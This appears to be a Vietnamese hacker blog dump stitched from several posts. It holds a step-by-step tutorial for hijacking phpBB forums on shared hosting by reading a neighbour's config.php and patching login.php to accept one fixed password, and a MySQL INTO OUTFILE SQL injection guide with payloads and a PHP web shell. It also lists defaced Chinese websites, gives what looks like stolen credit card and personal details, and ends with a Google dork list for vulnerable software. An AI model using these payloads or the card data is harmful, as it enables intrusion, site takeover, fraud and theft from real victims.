-Cách crack cổ điển bằng ASM (Bước 6.1)
Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,.. để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở Cpanel thì URL Root cho các domain hosting là http://[IP Server]/~user .vv
Chúc các bạn thành công
###### Header Begin
Project Name: How to hack a localsite
Founder: Luke/Lukos
Found day: 31/08/2002
Use for Education and Experiences Only
###### Header End
Rất tình cờ, khi học PHP tôi tìm ra một cách để hack được một số Web Portal hoặc forum của hầu hết các free hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất thời gian
Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's passwd, cái này chắc nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì vậy tôi cũng chỉ xin lấy một ví dụ là hack phpBB forum để làm mẫu chung cho các kiểu Portal hay forum khác.
Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/
Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward ..
Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://root/mysite/
Bước 3 Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.
3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau
## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3
Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5
Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://root/mysite/
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của http://root/victim/phpBB_path tức là bạn đã thành công bước này
Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: "hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu như sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tiếp đó tìm đoạn mã sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sửa đoạn mã đó thành
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát
I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết
II/Ví dụ.
-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục đích học hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là "hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham khảo
III/Kinh nghiệm
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau
-Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3)
-Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4)
-Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5)
-Cách crack cổ điển bằng ASM (Bước 6.1)
Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP-CGI,.. để có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở Cpanel thì URL Root cho các domain hosting là http://[IP Server]/~user .vv
Chúc các bạn thành công
Kỹ thuật tấn công SQLi sử dụng lệnh into outfile của mysql
Trong bài viết này tôi sẽ đề cập đến câu lệnh “into outfile“, 1 câu lệnh mặc định của MySQl nhưng lại rất hữu ích cho các attacker khi tấn công web bị dính lỗi SQL Injection (tất nhiên DBs là MySQL). Ngoài ra chúng ta cũng sẽ xem xét qua một số điều kiện như quyền đối với file (FILE privilege) và vấn đề thư mục liên quan.
1. Quyền FILE (FILE privilege)
Nếu chúng ta muốn đọc hay ghi các file thì MySQL user phải được cấp quyền FILE
Thử xem xét một số lệnh sau đây:
hoặc
Các câu lệnh này có thể cung cấp thông tin về MySQL user hiện tại, dạng như:
Usernam@server
Chúng ta sẽ tiếp tục khai thác thông tin về user này trong phần sau
Hoặc bạn cũng có thể đoán tên user bằng Blind SQLi nếu như không union được.
Các câu lệnh ví dụ:
Khi chúng ta đã biết username, ta có thể kiểm tra xem user này có quyền FILE hay không
Đầu tiên chúng ta sẽ cố gắng truy cập vào bảng mysql.user:
Chú ý: thay username ở câu lệnh trên bằng username mà các bạn vừa tìm được
Bạn cũng có thể kiểm tra quyền FILE trong bảng trên mà không cần thêm mệnh đề where, tuy nhiên tôi
vẫn thêm nó vào vì đây là cách nhanh và dễ dàng nhất – khi chuyển sang Blind
Cách trên có thể áp dụng cho cả Mysql version 4.x và 5.x
Nếu MySQL là 5.x ta còn có thể xem quyền FILE ngay trong information_schema
Với blind:
Nếu bạn không thể truy cập vào bảng mysql.user hoặc information_schema.user chúng ta cũng cứ
bước tiếp thao sau đây. Tuy nhiên nếu bạn đoán rằng bạn không có quyền FILE thì cách khai thác
sử dụng INTO OUTFILE sẽ không thực hiện được
2. Vấn đề về thư mục web
Khi chúng ta biết chắc rằng mysql user hiện tại có quyền FILE, chúng ta cần phải tìm cho được đường dẫn
chính xác đến thư mục/file mà ta muốn ghi file.
Trong hầu hết các trường hợp MySQL server được chạy cùng server với server web hosting vì thế ta có thể từ
mục ghi file mặc định chuyển ra thư mục web bằng các dấu ../
Với Mysql ver 4, ta có thể tìm đường dẫn datadir bằng hiển thị lỗi của câu lệnh:
Trong Mysql 5 thì có thể union select:
Thư mục mặc định để ghi file sẽ là datadir\databasename
Bạn có thể biết được tên databasename bằng câu lệnh
Nếu may mắn, chúng ta có thể thấy các warning của các lệnh như mysql_result(), mysql_free_result(),
mysql_fetch_row() hoặc các lệnh tương tự.
Trong các warning này sẽ hiển thị đường dẫn đến thư mục web và chúng ta dễ dàng xác định được
thư mục để ghi file lên. Các warning này có dạng như
để hiện thị warning này có thể thử câu lệnh 0′ AND 1=’0
Cách làm trên có hiệu quả đối với hầu hết mọi website, tuy nhiên nếu thông báo lỗi của mysql bị tắt thì
bạn có thể cố gắng đoán thư mục chứa web bằng cách sử dụng lệnh LOAD_FILE() để load và đọc các file cấu hình.
1 số đường dẫn mặc định đến file cấu hình:
Cũng cần chú ý xem hệ điều hành của webserver là *nix hay win để mà đoán cho tốt
Thông thường thư mục gốc chứa web thường đặt ở:
bạn có thể google để tìm thêm
Thông thường bạn có thể ghi files lên tất cả các thư mục mà Mysql server có quyền ghi lên, miễn là bạn có quyền FILE.
Tuy nhiên Admin có thể giới hạn các thư mục có thể ghi được từ public.
Xem thêm tại http://dev.mysql.com/doc/refman/5.1/...s-options.html
3. Tạo ra các file hữu dụng
Khi bạn đã chắc chắn có quyền FILE và xác định được thư mục để ghi file, bạn có thể tiến hành ghi bằng câu lệnh SQL
Hoặc là ghi bất cứ dữ liệu gì, khi ta không biết tên bảng và cột:
Nếu muốn bỏ các ký tự splitting trong dữ liệu, ta có thể sử dụng INTO DUMPFILE thay vì INTO OUTFILE
Cũng có thể kết hợp giữa load_file() để đọc các file trên server
Trong một số trường hợp ta cần sử dụng hex và unhex:
Hoặc bạn có thể ghi bất cứ thứ j vào file, như là webshell chẳng hạn
Đây là 1 số ví dụ:
hoặc passthru nếu muốn
Cuối cùng, 1 số chú ý về kiểu khai thác này:
-Không thể overwrite file với câu lệnh này
-INTO OUTFILE phải là mệnh đề cuối cùng trong câu truy vấn
-Tôi không biết cách nào để mã hóa FILENAME trong INTO OUTFILE(‘FILENAME‘) chặn ‘ thì
không khai thác được, biết cách khai thác vui lòng PM
-có thể mã hóa code bạn muốn ghi vào file bằng lệnh char()
1. Quyền FILE (FILE privilege)
Nếu chúng ta muốn đọc hay ghi các file thì MySQL user phải được cấp quyền FILE
Thử xem xét một số lệnh sau đây:
Code:
1' union select current_user,null/*
Code:
1' union select user(),null/*
Usernam@server
Chúng ta sẽ tiếp tục khai thác thông tin về user này trong phần sau
Hoặc bạn cũng có thể đoán tên user bằng Blind SQLi nếu như không union được.
Các câu lệnh ví dụ:
Code:
1' and user() like 'root 1' and mid(user(),1,1) 1' and mid(user(),2,1)>'m 1'
and ascii(substring(user(),1,1))>64 .....
Đầu tiên chúng ta sẽ cố gắng truy cập vào bảng mysql.user:
Code:
1' union select file_priv,null from mysql.user where user='username
Bạn cũng có thể kiểm tra quyền FILE trong bảng trên mà không cần thêm mệnh đề where, tuy nhiên tôi
vẫn thêm nó vào vì đây là cách nhanh và dễ dàng nhất – khi chuyển sang Blind
Code:
1' and mid((select file_priv from mysql.user where user='username'),1,1)='a
(đừng có thêm NULL ở đây, vì đây ko phải là union select)
Nếu MySQL là 5.x ta còn có thể xem quyền FILE ngay trong information_schema
Code:
0′ union select grantee,is_grantable FROM information_schema.user_privileges
privilege_type = ‘file’ and grantee like ‘%username%
Code:
1′ and mid((select is_grantable from information_schema.user_privileges
where privilege_type = ‘file’ and grantee like ‘%username%’),1,1)=’Y
bước tiếp thao sau đây. Tuy nhiên nếu bạn đoán rằng bạn không có quyền FILE thì cách khai thác
sử dụng INTO OUTFILE sẽ không thực hiện được
2. Vấn đề về thư mục web
Khi chúng ta biết chắc rằng mysql user hiện tại có quyền FILE, chúng ta cần phải tìm cho được đường dẫn
chính xác đến thư mục/file mà ta muốn ghi file.
Trong hầu hết các trường hợp MySQL server được chạy cùng server với server web hosting vì thế ta có thể từ
mục ghi file mặc định chuyển ra thư mục web bằng các dấu ../
Với Mysql ver 4, ta có thể tìm đường dẫn datadir bằng hiển thị lỗi của câu lệnh:
Code:
0′ UNION SELECT load_file(’a'),null/*
Code:
0′ UNION SELECT @@datadir,null/*
Bạn có thể biết được tên databasename bằng câu lệnh
Code:
0′ UNION SELECT database(),null/*
mysql_fetch_row() hoặc các lệnh tương tự.
Trong các warning này sẽ hiển thị đường dẫn đến thư mục web và chúng ta dễ dàng xác định được
thư mục để ghi file lên. Các warning này có dạng như
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /home/shop/shopping2/list1.html on line 80
Cách làm trên có hiệu quả đối với hầu hết mọi website, tuy nhiên nếu thông báo lỗi của mysql bị tắt thì
bạn có thể cố gắng đoán thư mục chứa web bằng cách sử dụng lệnh LOAD_FILE() để load và đọc các file cấu hình.
1 số đường dẫn mặc định đến file cấu hình:
Code:
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
Thông thường thư mục gốc chứa web thường đặt ở:
Code:
/var/www/html/
/var/www/web1/html/
/var/www/sitename/htdocs/
/var/www/localhost/htdocs
/var/www/vhosts/sitename/httpdocs/
Thông thường bạn có thể ghi files lên tất cả các thư mục mà Mysql server có quyền ghi lên, miễn là bạn có quyền FILE.
Tuy nhiên Admin có thể giới hạn các thư mục có thể ghi được từ public.
Xem thêm tại http://dev.mysql.com/doc/refman/5.1/...s-options.html
3. Tạo ra các file hữu dụng
Khi bạn đã chắc chắn có quyền FILE và xác định được thư mục để ghi file, bạn có thể tiến hành ghi bằng câu lệnh SQL
Code:
0′ UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/dir/file.txt
Code:
1′ OR 1=1 INTO OUTFILE ‘../../web/dir/file.txt
Cũng có thể kết hợp giữa load_file() để đọc các file trên server
Code:
0′ AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘…
Code:
0′ AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘…
Code:
0′ AND 1=0 UNION SELECT ‘code’,null INTO
OUTFILE ‘../../web/server/dir/file.php
Code:
// PHP SHELL
<? system($_GET['c']); ?>
Code:
// webserver info
<? phpinfo(); ?>
// SQL QUERY
<? ... $result = mysql_query($_GET['query']); … ?>
-Không thể overwrite file với câu lệnh này
-INTO OUTFILE phải là mệnh đề cuối cùng trong câu truy vấn
-Tôi không biết cách nào để mã hóa FILENAME trong INTO OUTFILE(‘FILENAME‘) chặn ‘ thì
không khai thác được, biết cách khai thác vui lòng PM
-có thể mã hóa code bạn muốn ghi vào file bằng lệnh char()
List site khựa checked sáng nay ngày 09/12/2012
Bị hack bởi members KunGa thuộc nhóm Demons Team
http://www.zhihuifa.net.cn/index.html
http://www.luteli.com.cn/index.html
http://qiufa.qiuti.com.cn/index.html
http://www.dujialong.cn/index.html
http://dianzhanfa.tiaojiefa.cc/index.html
http://laliantou.3w4.net.cn/index.html
http://kaiguan.qiuti.com.cn/index.html
http://qidongfamen.3w4.net.cn/index.html
http://2winvalve.com/index.html
http://www.0577hzp.cn/index.html
http://www.wzanbo.com/index.html
http://xilaigao.com/index.html
http://www.kaixite.cn/index.html
http://jiangyefa.com.cn/index.html
http://shiyanshipeijian.syspj.net/index.html
http://www.kongzhifa.com.cn/index.html
http://www.sibengfei.com.cn/index.html
http://fengtiao.3w4.net.cn/index.html
http://www.lanqiuji.com/index.html
http://www.wzdssl.com/index.html
http://www.laliji.net.cn/index.html
http://www.diandongtiaojiefa.net/index.html
http://mtmrmf.com/index.html
http://www.qiu-fa.com/index.html
http://www.jiezhifa.cn/index.html
http://haiwan.youbeng.org.cn/index.html
http://www.demanlai.cn/index.html
http://www.dianchiche.com/index.html
http://www.dijiaer.cn/index.html
http://www.616v.cn/index.html
http://syspj.net/index.html
http://86198330.com/index.html
http://www.xiehuifa.cn/index.html
http://buxiugangqiufa.com/index.html
http://yutong8.com/index.html
http://www.nijiangfa.com/index.html
http://www.shuilikongzhifa.com.cn/index.html
http://www.toysw.cn/index.html
http://trampoline.com.cn/index.html
http://demanlai.com/index.html
http://www.qiangbikaiguan.net/index.html
http://www.zjseals.com/index.html
http://luteli.com/index.html
http://www.maqiduo.com/index.html
http://www.paperpost.com.cn/index.html
http://www.fengtiao.cn/index.html
http://www.70-8.cn/index.html
http://www.qiufa.net.cn/index.html
http://yjdfay.com/index.html
http://guanlifa.com/index.html
http://www.tianyatea.net/index.html
http://www.laoshuji.cn/index.html
http://www.zhihuifa.net.cn/index.html
http://www.luteli.com.cn/index.html
http://qiufa.qiuti.com.cn/index.html
http://www.dujialong.cn/index.html
http://dianzhanfa.tiaojiefa.cc/index.html
http://laliantou.3w4.net.cn/index.html
http://kaiguan.qiuti.com.cn/index.html
http://qidongfamen.3w4.net.cn/index.html
http://2winvalve.com/index.html
http://www.0577hzp.cn/index.html
http://www.wzanbo.com/index.html
http://xilaigao.com/index.html
http://www.kaixite.cn/index.html
http://jiangyefa.com.cn/index.html
http://shiyanshipeijian.syspj.net/index.html
http://www.kongzhifa.com.cn/index.html
http://www.sibengfei.com.cn/index.html
http://fengtiao.3w4.net.cn/index.html
http://www.lanqiuji.com/index.html
http://www.wzdssl.com/index.html
http://www.laliji.net.cn/index.html
http://www.diandongtiaojiefa.net/index.html
http://mtmrmf.com/index.html
http://www.qiu-fa.com/index.html
http://www.jiezhifa.cn/index.html
http://www.cnfeiyao.com/index.html
http://haiyangqiu.com/index.html
http://www.58gd.cn/index.html
http://xintong-valve.com/index.html
http://www.wzluyi.com/index.html
http://www.huatai1988.com/index.html
http://zuhehuati.com/index.html
http://qidongqiufa.com/index.html
http://www.jixiangtoys.com.cn/index.html
http://www.guamianji.cn/index.html
http://www.hht.cc/index.html
http://jbglasses.com/index.html
http://hqvalve.com/index.html
http://www.risingvalve.com/index.html
http://chunxichina.com/index.html
http://www.jiangyefa.cn/index.html
http://www.ceshiyi.org.cn/index.html
http://wcwwc.com/index.html
http://taikonghuan.com/index.html
http://www.lvxiangcn.com/index.html
china là CLGT
china ăn
Thứ Bảy, 8 tháng 12, 2012
Miễn phí tên miền .me 1 năm
Cụ thể là đây
Ai ko đọc đc tiếng anh thì đọc ở dưới :
down cái này về
cài vào rồi tạo 1 email ở trong đó
chọn domain .me, order. Nhớ ghi info US để đc free.
Muốn xem tut thì đây:
BONUS:
Không có info US thì thử cái này:
4313070123731652 | 1 | 2013 | 923 | Benjamin Kramer | 1705 Purdy Street Apt MG | Bronx | NY | 10462 | United States | 9174993591 |
Thứ Năm, 6 tháng 12, 2012
Dork Google hay cho ae
Dork: inurl:"/chat/phpMyChat.php3"
Link: phpMyChat v0.14.5 Multiple Vulnerabilities
--------------------------------------------------------------------------------
Dork: "powered by talkback"
Author: civi
Link: TalkBack 2.2.7 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork: "Total members:" AND "Paid out:" AND "Redeemed:"
Author: fuzion
Link: Amber Script 1.0 (show_content.php id) Local File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:Commence intitle:"Commence Conference System"
Author: fuzion
Link: IAPR COMMENCE 1.3 Multiple Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: inurl:"/hp/device/this.LCDispatcher"
--------------------------------------------------------------------------------
Dork: intitle:"Broadband Router Status"
--------------------------------------------------------------------------------
Dork: "Powered by SHP"
Author: civi
Link: Sciurus Hosting Panel Code Inject Exploit
--------------------------------------------------------------------------------
Dork: "Powered by icebb"
Author: civi
Link: IceBB 1.0-rc6 - Database Authentication Details Exploit
--------------------------------------------------------------------------------
Dork: "Powered by ExoPHPDesk v1.2.1"
Link: ExoPHPDesk Index.PHP Multiple Input Validation Vulnerabilities
--------------------------------------------------------------------------------
Dork: "Powered by GuppY"
Link: GuppY Error.PHP Remote File Include and Command Execution Vulnerability
--------------------------------------------------------------------------------
Dork: "MySQL Administrator dump" filetype:sql
--------------------------------------------------------------------------------
Dork: intitle:"Helios Calendar Event Management System"
Author: Maximiliano Soler
Link: Helios Calendar <=1.2.1 Beta (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:Powered by UebiMiau! intitle:uebimiau inurl:/webmail/index.php?lid=
Author: Maximiliano Soler
Link: UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by MailBee WebMail"
Author: Maximiliano Soler
Link: MailBee WebMail Pro <=3.4 (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: intext:"Powered by SocketKB version"
Author: Maximiliano Soler
Link: SocketKB <=1.1.5 (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"/info.php?reason=link" intitle:"BlaB!"
Author: Maximiliano Soler
Link: BlaB! Chat < 3.3 (XSS) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork: inurl:"setup-config.php" intitle:"WordPress * Setup"
--------------------------------------------------------------------------------
Dork: intitle:"Micro Login System" inurl:login.php
Link: Micro Login System v1.0 Password Disclosure
--------------------------------------------------------------------------------
Dork: inurl:"efileman.cgi"
Link: eFileman Remote File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: intext:"MySQL-Dump" "Host: localhost" filetype:sql
--------------------------------------------------------------------------------
Dork: intext:"PostgreSQL database dump" filetype:sql
--------------------------------------------------------------------------------
Dork: intext:"phpBB Backup Script" filetype:sql
--------------------------------------------------------------------------------
Dork: intext:"phpMyAdmin MySQL-Dump" filetype:sql
--------------------------------------------------------------------------------
Dork: "Powered by ReloadCMS 1.2.5"
Link: ReloadCMS Index.PHP Local File Include Vulnerability
--------------------------------------------------------------------------------
Dork: intitle:"Index of" intext:"LiteSpeed Web Server at"
Link: LiteSpeed Remote Mime Type Injection
--------------------------------------------------------------------------------
Dork: intitle:"SiteBar" inurl:command
Link: SiteBar Command.PHP Cross-Site Scripting Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by rnote" inurl:"rnote.php"
Link: rNote rnote.PHP Multiple Cross Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork: CMS von artmedic webdesign
Author: iNs
Link: artmedic CMS Local File Inclusion
--------------------------------------------------------------------------------
Dork: com_wmtrssreader
Author: civi
Link: wmtrssreader joomla component 1.0 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork: com_swmenufree
Author: civi
Link: Joomla! swMenuFree 4.6 Component Remote File Include
--------------------------------------------------------------------------------
Dork: com_mambocredits
Author: civi
Link: com_mambocredits Remote File Incluison
--------------------------------------------------------------------------------
Dork: "Powered by Tikiwiki"
Author: civi
Link: TikiWiki 1.9.8 Remote PHP Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by lightblog"
Author: civi
Link: LightBlog 8.4.1.1 Remote Code Execution Exploit
--------------------------------------------------------------------------------
Dork: "Powered by Cart32" inurl:cart32.exe -Demo
Link: Cart32 GetImage Arbitrary File Download Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by DRBGuestbook"
Link: DRBGuestbook Remote XSS Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by actsite"
Author: civi
Link: actSite v1.991 Beta (base.php) Remote File Inclusion
--------------------------------------------------------------------------------
Dork: "Powered by MDPro"
Link: MDPro 1.0.76 Remote SQL Injection Exploit
--------------------------------------------------------------------------------
Dork: "Powered by mxBB"
Link: mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
--------------------------------------------------------------------------------
Dork:
1) "Powered by phpBB" inurl:"faq.php?mode=openid"
2) "Powered by phpBB" openid
Author: salentinohack
Link: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion Vuln
--------------------------------------------------------------------------------
Dork: "integramod nederland(s)"
Author: civi
Link: IntegraMOD Nederland 1.4.2 Remote File Inclusion Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by ActiveKB Knowledgebase Software"
Author: salentinohack
Link: ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
Dork:
1) "Powered by Nuke-Evolution" intitle:NukeSentinel
2) inurl:/modules.php?name=NukeSentinel
Link: NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit
--------------------------------------------------------------------------------
Dork:
1) "Powered by Xcms"
2) inurl:"/index.php?lng=it" "Amministrazione sito"
Link: XCMS Arbitrary Command Execution Vuln
--------------------------------------------------------------------------------
Dork: "Powered by phpBB XS" inurlCant See Imagesrofile.php
Link: phpBB XS Profile.PHP HTML Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by SimplePHPBlog"
Link: SimplePHPBlog img_upload_cgi.php Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by PhpWebGallery" inurlCant See Imagesicture.php
Link: PhpWebGallery Picture.PHP HTML Injection Vulnerability
--------------------------------------------------------------------------------
Dork: "Powered by Phormer"
Link: Phormer Index.PHP Multiple Cross-Site Scripting Vulnerabilities
--------------------------------------------------------------------------------
Dork:
1) "Powered by iziContents"
Author: civi
Link: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities
--------------------------------------------------------------------------------
Dork:
1) "Powered by phpBB2 Plus"
2) inurl:"/phpBBplus/*.php" filetypeCant See Imageshp
